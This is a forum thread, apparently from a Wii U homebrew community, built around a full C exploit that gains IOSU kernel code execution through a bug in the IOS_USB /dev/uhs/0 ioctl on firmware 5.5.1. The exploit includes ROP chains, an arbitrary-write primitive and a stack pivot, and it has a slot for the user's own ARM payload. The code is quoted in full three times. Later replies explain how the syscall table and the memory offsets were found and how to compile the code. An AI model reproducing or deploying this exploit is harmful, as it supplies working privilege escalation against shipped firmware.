Hacking ROP from within IOS_USB (5.5.1)


Oct 8, 2015
Jinan, Shandong
Here's IOSU kernel code execution (using the IOS_CreateThread vector which is described on wiiubrew):

#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include "dynamic_libs/os_functions.h"
#include "dynamic_libs/fs_functions.h"
#include "dynamic_libs/gx2_functions.h"
#include "dynamic_libs/sys_functions.h"
#include "dynamic_libs/vpad_functions.h"
#include "dynamic_libs/padscore_functions.h"
#include "dynamic_libs/socket_functions.h"
#include "dynamic_libs/ax_functions.h"
#include "fs/fs_utils.h"
#include "fs/sd_fat_devoptab.h"
#include "system/memory.h"
#include "utils/logger.h"
#include "utils/utils.h"
#include "common/common.h"
#include "main.h"

int dev_uhs_0_handle;

/* YOUR ARM CODE HERE (starts at 0x08122500) */
int execute_me[] = {
    0xE3A00000,       // MOV R0, #0
    0xE12FFF1E,       // BX LR

#define CHAIN_START         0x1016AD40
#define SHUTDOWN         0x1012EE4C
#define SIMPLE_RETURN      0x101014E4
#define SOURCE            (0x120000)

/* ROP CHAIN STARTS HERE (0x1015BD78) */
int final_chain[] = {
    0x101236f3,        // 0x00     POP {R1-R7,PC}
    0x0,               // 0x04     arg
    0x0812974C,        // 0x08     stackptr     CMP R3, #1; STREQ R1, [R12]; BX LR
    0x68,              // 0x0C     stacksize
    0x10101638,        // 0x10
    0x0,               // 0x14
    0x0,               // 0x18
    0x0,               // 0x1C
    0x1010388C,        // 0x20     CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,               // 0x24
    0x0,               // 0x28
    0x1012CFEC,        // 0x2C     MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x30
    0x0,               // 0x34
    IOS_CREATETHREAD,  // 0x38
    0x1,               // 0x3C
    0x2,               // 0x40
    0x10123a9f,        // 0x44     POP {R0,R1,R4,PC}
    0x0812A314,        // 0x48     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xEE030F10,        // 0x4C     value: MCR    P15, #0, R0, C3, C0, #0 (set dacr to R0)
    0x0,               // 0x50
    0x10123a8b,        // 0x54     POP {R3,R4,PC}
    0x1,               // 0x58     R3 must be 1 for the arbitrary write
    0x0,               // 0x5C
    0x1010CD18,        // 0x60     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x64
    0x0,               // 0x68
    0x1012EE64,        // 0x6C     set_panic_behavior (arbitrary write)
    0x0,               // 0x70
    0x0,               // 0x74
    0x10123a9f,        // 0x78     POP {R0,R1,R4,PC}
    0x0812A314 + 0x4,  // 0x7C     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE1A0D001,        // 0x80     value: MOV SP, R1
    0x0,               // 0x84
    0x10123a8b,        // 0x88     POP {R3,R4,PC}
    0x1,               // 0x8C     R3 must be 1 for the arbitrary write
    0x0,               // 0x90
    0x1010CD18,        // 0x94     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x98
    0x0,               // 0x9C
    0x1012EE64,        // 0xA0     set_panic_behavior (arbitrary write)
    0x0,               // 0xA4
    0x0,               // 0xA8
    0x10123a9f,        // 0xAC     POP {R0,R1,R4,PC}
    0x0812A314 + 0x8,  // 0xB0     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE8BD800F,        // 0xB4     value: LDMFD SP!, {R0-R3,PC}
    0x0,               // 0xB8
    0x10123a8b,        // 0xBC     POP {R3,R4,PC}
    0x1,               // 0xC0     R3 must be 1 for the arbitrary write
    0x0,               // 0xC4
    0x1010CD18,        // 0xC8     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0xCC
    0x0,               // 0xD0
    0x1012EE64,        // 0xD4     set_panic_behavior (arbitrary write)
    0x0,               // 0xD8
    0x0,               // 0xDC
    0x10123a9f,        // 0xE0     POP {R0,R1,R4,PC}
    0xFFFFFFFF,        // 0xE4     enable read/write everywhere
    0x1015BD78 + 0xF4, // 0xE8     location of privileged stack
    0x0,               // 0xEC
    0x1012EB8C,        // 0xF0     IOS_GetUpTime64 (privileged stack pivot) (ends in LDMFD SP!, {R0-R3,PC})
    0x08122500,        // 0xF4     destination
    0x00140000,        // 0xF8     source
    sizeof(execute_me),// 0xFC     length
    0x0,               // 0x100
    0x08131AE4,        // 0x104    BL KERNEL_MEMCPY; MOV R0, R4; ADD SP, SP, #8; LDMFD SP!, {R4-R8,PC}
    0x0,               // 0x108
    0x0,               // 0x10C
    0xFFFFDC48,        // 0x110    Will be the LR: shutdown syscall
    0x0,               // 0x114
    0x0,               // 0x118
    0x0,               // 0x11C
    0x0,               // 0x120
    0x0812A124,        // 0x124    MOV LR, R4; MOV R0, LR; LDMFD SP!, {R4,PC}
    0x0,               // 0x128 
    0x08122500,        // 0x12C    Jump to code!

int second_chain[] = {
    0x10123a9f, // 0x00         POP {R0,R1,R4,PC}
    CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000,     // 0x04         destination
    0x0,        // 0x08     
    0x0,        // 0x0C     
    0x101063db, // 0x10         POP {R1,R2,R5,PC}
    0x00130000, // 0x14         source
    sizeof(final_chain),          // 0x18         length
    0x0,        // 0x1C     
    0x10106D4C, // 0x20         BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x24     
    0x0,        // 0x28     
    0x101236f3, // 0x2C         POP {R1-R7,PC}
    0x0,        // 0x30         arg
    0x101001DC, // 0x34         stackptr
    0x68,       // 0x38         stacksize
    0x10101634, // 0x3C         proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x40
    0x0,        // 0x44
    0x0,        // 0x48
    0x1010388C, // 0x4C         CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,        // 0x50
    0x0,        // 0x54
    0x1012CFEC, // 0x58         MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,        // 0x5C
    0x0,        // 0x60
    0x1,        // 0x68         priority
    0x2,        // 0x6C         flags
    0x0,        // 0x70
    0x0,        // 0x74
    0x101063db, // 0x78         POP {R1,R2,R5,PC}
    0x0,        // 0x7C     
    -(0x240 + 0xF000), // 0x80  stack offset
    0x0,        // 0x84     
    0x1011D424, // 0x88         LDMFD SP!, {R4-R11,PC}
    0x0,        // 0x8C     
    0x0,        // 0x90     
    0x0,        // 0x94     
    0x0,        // 0x98     
    0x0,        // 0x9C     
    0x0,        // 0xA0     
    0x0,        // 0xA4     
    0x4,        // 0xA8         R11 must equal 4 in order to pivot the stack
    0x1012EA68, // 0xAC         stack pivot

int Menu_Main(void) {
    InitOSFunctionPointers();                  //! Init coreinit functions adresses
    dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);   //! Open /dev/uhs/0 IOS node
    uhs_exploit_init();                        //! Init variables for the exploit

                                              //!------ROP CHAIN-------
    uhs_write32(CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
    uhs_write32(CHAIN_START + 0x10, 0x1011814C);
    uhs_write32(CHAIN_START + 0xC, SOURCE);

    uhs_write32(CHAIN_START, 0x1012392b); // pop {R4-R6,PC}

    IOS_Close(dev_uhs_0_handle);               //! Close /dev/uhs/0 IOS node
    return EXIT_SUCCESS;                     //! Exit from HBL

//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5003ABC;
int *ayylmao = (int*)0xF4500000;

void uhs_exploit_init() {
    ayylmao[5] = 1;
    ayylmao[8] = 0x500000;

    memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
    memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
    memcpy((char*)(0xF4140000), execute_me, sizeof(execute_me));

    pretend_root_hub[33] = 0x500000;
    pretend_root_hub[78] = 0;

    DCFlushRange(pretend_root_hub + 33, 200);      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange(pretend_root_hub + 33, 200);   //! |for "pretend_root_hub"

    DCFlushRange((void*)0xF4120000, sizeof(second_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4120000, sizeof(second_chain));   //! |for second chain inside MEM1
    DCFlushRange((void*)0xF4130000, sizeof(final_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4130000, sizeof(final_chain));   //! |for final chain inside MEM1
    DCFlushRange((void*)0xF4140000, sizeof(execute_me));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4140000, sizeof(execute_me));   //! |for final chain inside MEM1

int uhs_write32(int arm_addr, int val) {
    ayylmao[520] = arm_addr - 24;                  //!  The address to be overwritten, minus 24 bytes
    DCFlushRange(ayylmao, 521 * 4);                //! |Make CPU fetch new data (with updated adress)
    DCInvalidateRange(ayylmao, 521 * 4);           //! |for "ayylmao"
    OSSleepTicks(0x200000);                        //!  Improves stability
    int request_buffer[] = { -(0xBEA2C), val };      //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
    int output_buffer[32];
    return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));

Put your code into execute_me and it'll execute. You have about 0x5D0 bytes of space. The above code will simply shut your console down as a demonstration.
So, for anyone that wants to know, now we really got IOSU as I understand it.


Well-Known Member
Sep 13, 2009
United States
Oh wow, that Wii-U my sister let me borrow and stopped giving a fuck about might have some use out of it after all!

I so couldn't help it :P


Well-Known Member
Dec 29, 2015
So, for anyone that wants to know, now we really got IOSU as I understand it.

Not until someone writes code to exploit IOSU. go ahead and compile this into an elf if you like and enjoy watching your WiiU reboot. That is all that we have been given by @Hillary_Clinton

This is purely for Developers to get a start on writing their own exploit which will allow them access to IOSU
Last edited by lembi2001,


Aug 18, 2015
Saint Kitts and Nevis
Here's IOSU kernel code execution (using the IOS_CreateThread vector which is described on wiiubrew):

#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include "dynamic_libs/os_functions.h"
#include "dynamic_libs/fs_functions.h"
#include "dynamic_libs/gx2_functions.h"
#include "dynamic_libs/sys_functions.h"
#include "dynamic_libs/vpad_functions.h"
#include "dynamic_libs/padscore_functions.h"
#include "dynamic_libs/socket_functions.h"
#include "dynamic_libs/ax_functions.h"
#include "fs/fs_utils.h"
#include "fs/sd_fat_devoptab.h"
#include "system/memory.h"
#include "utils/logger.h"
#include "utils/utils.h"
#include "common/common.h"
#include "main.h"

int dev_uhs_0_handle;

/* YOUR ARM CODE HERE (starts at 0x08122500) */
int execute_me[] = {
    0xE3A00000,       // MOV R0, #0
    0xE12FFF1E,       // BX LR

#define CHAIN_START         0x1016AD40
#define SHUTDOWN         0x1012EE4C
#define SIMPLE_RETURN      0x101014E4
#define SOURCE            (0x120000)

/* ROP CHAIN STARTS HERE (0x1015BD78) */
int final_chain[] = {
    0x101236f3,        // 0x00     POP {R1-R7,PC}
    0x0,               // 0x04     arg
    0x0812974C,        // 0x08     stackptr     CMP R3, #1; STREQ R1, [R12]; BX LR
    0x68,              // 0x0C     stacksize
    0x10101638,        // 0x10
    0x0,               // 0x14
    0x0,               // 0x18
    0x0,               // 0x1C
    0x1010388C,        // 0x20     CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,               // 0x24
    0x0,               // 0x28
    0x1012CFEC,        // 0x2C     MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x30
    0x0,               // 0x34
    IOS_CREATETHREAD,  // 0x38
    0x1,               // 0x3C
    0x2,               // 0x40
    0x10123a9f,        // 0x44     POP {R0,R1,R4,PC}
    0x0812A314,        // 0x48     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xEE030F10,        // 0x4C     value: MCR    P15, #0, R0, C3, C0, #0 (set dacr to R0)
    0x0,               // 0x50
    0x10123a8b,        // 0x54     POP {R3,R4,PC}
    0x1,               // 0x58     R3 must be 1 for the arbitrary write
    0x0,               // 0x5C
    0x1010CD18,        // 0x60     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x64
    0x0,               // 0x68
    0x1012EE64,        // 0x6C     set_panic_behavior (arbitrary write)
    0x0,               // 0x70
    0x0,               // 0x74
    0x10123a9f,        // 0x78     POP {R0,R1,R4,PC}
    0x0812A314 + 0x4,  // 0x7C     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE1A0D001,        // 0x80     value: MOV SP, R1
    0x0,               // 0x84
    0x10123a8b,        // 0x88     POP {R3,R4,PC}
    0x1,               // 0x8C     R3 must be 1 for the arbitrary write
    0x0,               // 0x90
    0x1010CD18,        // 0x94     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x98
    0x0,               // 0x9C
    0x1012EE64,        // 0xA0     set_panic_behavior (arbitrary write)
    0x0,               // 0xA4
    0x0,               // 0xA8
    0x10123a9f,        // 0xAC     POP {R0,R1,R4,PC}
    0x0812A314 + 0x8,  // 0xB0     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE8BD800F,        // 0xB4     value: LDMFD SP!, {R0-R3,PC}
    0x0,               // 0xB8
    0x10123a8b,        // 0xBC     POP {R3,R4,PC}
    0x1,               // 0xC0     R3 must be 1 for the arbitrary write
    0x0,               // 0xC4
    0x1010CD18,        // 0xC8     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0xCC
    0x0,               // 0xD0
    0x1012EE64,        // 0xD4     set_panic_behavior (arbitrary write)
    0x0,               // 0xD8
    0x0,               // 0xDC
    0x10123a9f,        // 0xE0     POP {R0,R1,R4,PC}
    0xFFFFFFFF,        // 0xE4     enable read/write everywhere
    0x1015BD78 + 0xF4, // 0xE8     location of privileged stack
    0x0,               // 0xEC
    0x1012EB8C,        // 0xF0     IOS_GetUpTime64 (privileged stack pivot) (ends in LDMFD SP!, {R0-R3,PC})
    0x08122500,        // 0xF4     destination
    0x00140000,        // 0xF8     source
    sizeof(execute_me),// 0xFC     length
    0x0,               // 0x100
    0x08131AE4,        // 0x104    BL KERNEL_MEMCPY; MOV R0, R4; ADD SP, SP, #8; LDMFD SP!, {R4-R8,PC}
    0x0,               // 0x108
    0x0,               // 0x10C
    0xFFFFDC48,        // 0x110    Will be the LR: shutdown syscall
    0x0,               // 0x114
    0x0,               // 0x118
    0x0,               // 0x11C
    0x0,               // 0x120
    0x0812A124,        // 0x124    MOV LR, R4; MOV R0, LR; LDMFD SP!, {R4,PC}
    0x0,               // 0x128
    0x08122500,        // 0x12C    Jump to code!

int second_chain[] = {
    0x10123a9f, // 0x00         POP {R0,R1,R4,PC}
    CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000,     // 0x04         destination
    0x0,        // 0x08    
    0x0,        // 0x0C    
    0x101063db, // 0x10         POP {R1,R2,R5,PC}
    0x00130000, // 0x14         source
    sizeof(final_chain),          // 0x18         length
    0x0,        // 0x1C    
    0x10106D4C, // 0x20         BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x24    
    0x0,        // 0x28    
    0x101236f3, // 0x2C         POP {R1-R7,PC}
    0x0,        // 0x30         arg
    0x101001DC, // 0x34         stackptr
    0x68,       // 0x38         stacksize
    0x10101634, // 0x3C         proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x40
    0x0,        // 0x44
    0x0,        // 0x48
    0x1010388C, // 0x4C         CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,        // 0x50
    0x0,        // 0x54
    0x1012CFEC, // 0x58         MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,        // 0x5C
    0x0,        // 0x60
    0x1,        // 0x68         priority
    0x2,        // 0x6C         flags
    0x0,        // 0x70
    0x0,        // 0x74
    0x101063db, // 0x78         POP {R1,R2,R5,PC}
    0x0,        // 0x7C    
    -(0x240 + 0xF000), // 0x80  stack offset
    0x0,        // 0x84    
    0x1011D424, // 0x88         LDMFD SP!, {R4-R11,PC}
    0x0,        // 0x8C    
    0x0,        // 0x90    
    0x0,        // 0x94    
    0x0,        // 0x98    
    0x0,        // 0x9C    
    0x0,        // 0xA0    
    0x0,        // 0xA4    
    0x4,        // 0xA8         R11 must equal 4 in order to pivot the stack
    0x1012EA68, // 0xAC         stack pivot

int Menu_Main(void) {
    InitOSFunctionPointers();                  //! Init coreinit functions adresses
    dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);   //! Open /dev/uhs/0 IOS node
    uhs_exploit_init();                        //! Init variables for the exploit

                                              //!------ROP CHAIN-------
    uhs_write32(CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
    uhs_write32(CHAIN_START + 0x10, 0x1011814C);
    uhs_write32(CHAIN_START + 0xC, SOURCE);

    uhs_write32(CHAIN_START, 0x1012392b); // pop {R4-R6,PC}

    IOS_Close(dev_uhs_0_handle);               //! Close /dev/uhs/0 IOS node
    return EXIT_SUCCESS;                     //! Exit from HBL

//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5003ABC;
int *ayylmao = (int*)0xF4500000;

void uhs_exploit_init() {
    ayylmao[5] = 1;
    ayylmao[8] = 0x500000;

    memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
    memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
    memcpy((char*)(0xF4140000), execute_me, sizeof(execute_me));

    pretend_root_hub[33] = 0x500000;
    pretend_root_hub[78] = 0;

    DCFlushRange(pretend_root_hub + 33, 200);      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange(pretend_root_hub + 33, 200);   //! |for "pretend_root_hub"

    DCFlushRange((void*)0xF4120000, sizeof(second_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4120000, sizeof(second_chain));   //! |for second chain inside MEM1
    DCFlushRange((void*)0xF4130000, sizeof(final_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4130000, sizeof(final_chain));   //! |for final chain inside MEM1
    DCFlushRange((void*)0xF4140000, sizeof(execute_me));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4140000, sizeof(execute_me));   //! |for final chain inside MEM1

int uhs_write32(int arm_addr, int val) {
    ayylmao[520] = arm_addr - 24;                  //!  The address to be overwritten, minus 24 bytes
    DCFlushRange(ayylmao, 521 * 4);                //! |Make CPU fetch new data (with updated adress)
    DCInvalidateRange(ayylmao, 521 * 4);           //! |for "ayylmao"
    OSSleepTicks(0x200000);                        //!  Improves stability
    int request_buffer[] = { -(0xBEA2C), val };      //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
    int output_buffer[32];
    return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));

Put your code into execute_me and it'll execute. You have about 0x5D0 bytes of space. The above code will simply shut your console down as a demonstration.
This should be in first page of the thread.


Oct 8, 2015
Jinan, Shandong
Not until someone writes code to exploit IOSU. go ahead and compile this into an elf if you like and enjoy watching your WiiU reboot. That is all that we have been given by @Hillary_Clinton

This is purely for Developers to get a start on writing their own exploit which will allow them access to IOSU
Nope, this is what I'm saying. The buttom of page 4 is an exploit. But there's nothing that runs yet on IOSU, so...


Well-Known Member
Nov 3, 2015
Hey @Hillary_Clinton !

Could we have more detail on it, like how have you found the IOSU Syscalls address and about the negative value of the root hub index (how did it redirect to the middle of mem1) because i might be interested on helping you (i didn't went that deep into arm side of the wii u)
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Reactions: ipatch


Well-Known Member
Aug 12, 2015
Just like this how to compile it? It give me some error when replacing dimok's main.c with the main.c from here...


Apr 23, 2016
United States
Hey @Hillary_Clinton !

Could we have more detail on it, like how have you found the IOSU Syscalls address and about the negative value of the root hub index (how did it redirect to the middle of mem1) because i might be interested on helping you (i didn't went that deep into arm side of the wii u)
I didn't find the IOSU syscall table myself, although I understand how it must have been found. The syscall handler is installed at address 0xFFFF0004. It is located at 0x0812DD6C. You can see that at address 0x0812DDF4 the syscall handler loads the address of the syscall table (0x081419F0) and uses the syscall number as an index into this table to find the address of the code for that particular syscall. That's how the syscall table and the code for each syscall must have been found. The negative value of the root hub index: it was just an arbitrary value that I chose to make the read end up in the middle of MEM1. I knew from reading the vulnerable code in IDA that a root hub structure is 0x144 bytes and that the root hub structures were located in IOS-USB's internal structure at offset 0x39EC. I knew the structure must have been located at the beginning of IOS-USB's local process heap at 0x10146060, but I didn't know where exactly at the time so I just sprayed the area in MEM1 where I thought it would read from with the appropriate values. I didn't know whether the read from MEM1 would actually work; I just tried it and it worked. I knew where MEM1 was mapped on the PPC side and the ARM side from reading the wiiubrew wiki. I hope I've answered your questions. :)

Just like this how to compile it? It give me some error when replacing dimok's main.c with the main.c from here...
Yeah, you have to modify some dynamic libs files. Download the .zip from my post here. Replace the main.c with the exploit code. Then merge the src folder into dimok's hello world example. That ought to work.


I wish I could read
Sep 5, 2013
Here's IOSU kernel code execution (using the IOS_CreateThread vector which is described on wiiubrew):

#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include "dynamic_libs/os_functions.h"
#include "dynamic_libs/fs_functions.h"
#include "dynamic_libs/gx2_functions.h"
#include "dynamic_libs/sys_functions.h"
#include "dynamic_libs/vpad_functions.h"
#include "dynamic_libs/padscore_functions.h"
#include "dynamic_libs/socket_functions.h"
#include "dynamic_libs/ax_functions.h"
#include "fs/fs_utils.h"
#include "fs/sd_fat_devoptab.h"
#include "system/memory.h"
#include "utils/logger.h"
#include "utils/utils.h"
#include "common/common.h"
#include "main.h"

int dev_uhs_0_handle;

/* YOUR ARM CODE HERE (starts at 0x08122500) */
int execute_me[] = {
    0xE3A00000,       // MOV R0, #0
    0xE12FFF1E,       // BX LR

#define CHAIN_START         0x1016AD40
#define SHUTDOWN         0x1012EE4C
#define SIMPLE_RETURN      0x101014E4
#define SOURCE            (0x120000)

/* ROP CHAIN STARTS HERE (0x1015BD78) */
int final_chain[] = {
    0x101236f3,        // 0x00     POP {R1-R7,PC}
    0x0,               // 0x04     arg
    0x0812974C,        // 0x08     stackptr     CMP R3, #1; STREQ R1, [R12]; BX LR
    0x68,              // 0x0C     stacksize
    0x10101638,        // 0x10
    0x0,               // 0x14
    0x0,               // 0x18
    0x0,               // 0x1C
    0x1010388C,        // 0x20     CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,               // 0x24
    0x0,               // 0x28
    0x1012CFEC,        // 0x2C     MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x30
    0x0,               // 0x34
    IOS_CREATETHREAD,  // 0x38
    0x1,               // 0x3C
    0x2,               // 0x40
    0x10123a9f,        // 0x44     POP {R0,R1,R4,PC}
    0x0812A314,        // 0x48     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xEE030F10,        // 0x4C     value: MCR    P15, #0, R0, C3, C0, #0 (set dacr to R0)
    0x0,               // 0x50
    0x10123a8b,        // 0x54     POP {R3,R4,PC}
    0x1,               // 0x58     R3 must be 1 for the arbitrary write
    0x0,               // 0x5C
    0x1010CD18,        // 0x60     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x64
    0x0,               // 0x68
    0x1012EE64,        // 0x6C     set_panic_behavior (arbitrary write)
    0x0,               // 0x70
    0x0,               // 0x74
    0x10123a9f,        // 0x78     POP {R0,R1,R4,PC}
    0x0812A314 + 0x4,  // 0x7C     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE1A0D001,        // 0x80     value: MOV SP, R1
    0x0,               // 0x84
    0x10123a8b,        // 0x88     POP {R3,R4,PC}
    0x1,               // 0x8C     R3 must be 1 for the arbitrary write
    0x0,               // 0x90
    0x1010CD18,        // 0x94     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x98
    0x0,               // 0x9C
    0x1012EE64,        // 0xA0     set_panic_behavior (arbitrary write)
    0x0,               // 0xA4
    0x0,               // 0xA8
    0x10123a9f,        // 0xAC     POP {R0,R1,R4,PC}
    0x0812A314 + 0x8,  // 0xB0     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE8BD800F,        // 0xB4     value: LDMFD SP!, {R0-R3,PC}
    0x0,               // 0xB8
    0x10123a8b,        // 0xBC     POP {R3,R4,PC}
    0x1,               // 0xC0     R3 must be 1 for the arbitrary write
    0x0,               // 0xC4
    0x1010CD18,        // 0xC8     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0xCC
    0x0,               // 0xD0
    0x1012EE64,        // 0xD4     set_panic_behavior (arbitrary write)
    0x0,               // 0xD8
    0x0,               // 0xDC
    0x10123a9f,        // 0xE0     POP {R0,R1,R4,PC}
    0xFFFFFFFF,        // 0xE4     enable read/write everywhere
    0x1015BD78 + 0xF4, // 0xE8     location of privileged stack
    0x0,               // 0xEC
    0x1012EB8C,        // 0xF0     IOS_GetUpTime64 (privileged stack pivot) (ends in LDMFD SP!, {R0-R3,PC})
    0x08122500,        // 0xF4     destination
    0x00140000,        // 0xF8     source
    sizeof(execute_me),// 0xFC     length
    0x0,               // 0x100
    0x08131AE4,        // 0x104    BL KERNEL_MEMCPY; MOV R0, R4; ADD SP, SP, #8; LDMFD SP!, {R4-R8,PC}
    0x0,               // 0x108
    0x0,               // 0x10C
    0xFFFFDC48,        // 0x110    Will be the LR: shutdown syscall
    0x0,               // 0x114
    0x0,               // 0x118
    0x0,               // 0x11C
    0x0,               // 0x120
    0x0812A124,        // 0x124    MOV LR, R4; MOV R0, LR; LDMFD SP!, {R4,PC}
    0x0,               // 0x128
    0x08122500,        // 0x12C    Jump to code!

int second_chain[] = {
    0x10123a9f, // 0x00         POP {R0,R1,R4,PC}
    CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000,     // 0x04         destination
    0x0,        // 0x08   
    0x0,        // 0x0C   
    0x101063db, // 0x10         POP {R1,R2,R5,PC}
    0x00130000, // 0x14         source
    sizeof(final_chain),          // 0x18         length
    0x0,        // 0x1C   
    0x10106D4C, // 0x20         BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x24   
    0x0,        // 0x28   
    0x101236f3, // 0x2C         POP {R1-R7,PC}
    0x0,        // 0x30         arg
    0x101001DC, // 0x34         stackptr
    0x68,       // 0x38         stacksize
    0x10101634, // 0x3C         proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x40
    0x0,        // 0x44
    0x0,        // 0x48
    0x1010388C, // 0x4C         CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,        // 0x50
    0x0,        // 0x54
    0x1012CFEC, // 0x58         MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,        // 0x5C
    0x0,        // 0x60
    0x1,        // 0x68         priority
    0x2,        // 0x6C         flags
    0x0,        // 0x70
    0x0,        // 0x74
    0x101063db, // 0x78         POP {R1,R2,R5,PC}
    0x0,        // 0x7C   
    -(0x240 + 0xF000), // 0x80  stack offset
    0x0,        // 0x84   
    0x1011D424, // 0x88         LDMFD SP!, {R4-R11,PC}
    0x0,        // 0x8C   
    0x0,        // 0x90   
    0x0,        // 0x94   
    0x0,        // 0x98   
    0x0,        // 0x9C   
    0x0,        // 0xA0   
    0x0,        // 0xA4   
    0x4,        // 0xA8         R11 must equal 4 in order to pivot the stack
    0x1012EA68, // 0xAC         stack pivot

int Menu_Main(void) {
    InitOSFunctionPointers();                  //! Init coreinit functions adresses
    dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);   //! Open /dev/uhs/0 IOS node
    uhs_exploit_init();                        //! Init variables for the exploit

                                              //!------ROP CHAIN-------
    uhs_write32(CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
    uhs_write32(CHAIN_START + 0x10, 0x1011814C);
    uhs_write32(CHAIN_START + 0xC, SOURCE);

    uhs_write32(CHAIN_START, 0x1012392b); // pop {R4-R6,PC}

    IOS_Close(dev_uhs_0_handle);               //! Close /dev/uhs/0 IOS node
    return EXIT_SUCCESS;                     //! Exit from HBL

//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5003ABC;
int *ayylmao = (int*)0xF4500000;

void uhs_exploit_init() {
    ayylmao[5] = 1;
    ayylmao[8] = 0x500000;

    memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
    memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
    memcpy((char*)(0xF4140000), execute_me, sizeof(execute_me));

    pretend_root_hub[33] = 0x500000;
    pretend_root_hub[78] = 0;

    DCFlushRange(pretend_root_hub + 33, 200);      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange(pretend_root_hub + 33, 200);   //! |for "pretend_root_hub"

    DCFlushRange((void*)0xF4120000, sizeof(second_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4120000, sizeof(second_chain));   //! |for second chain inside MEM1
    DCFlushRange((void*)0xF4130000, sizeof(final_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4130000, sizeof(final_chain));   //! |for final chain inside MEM1
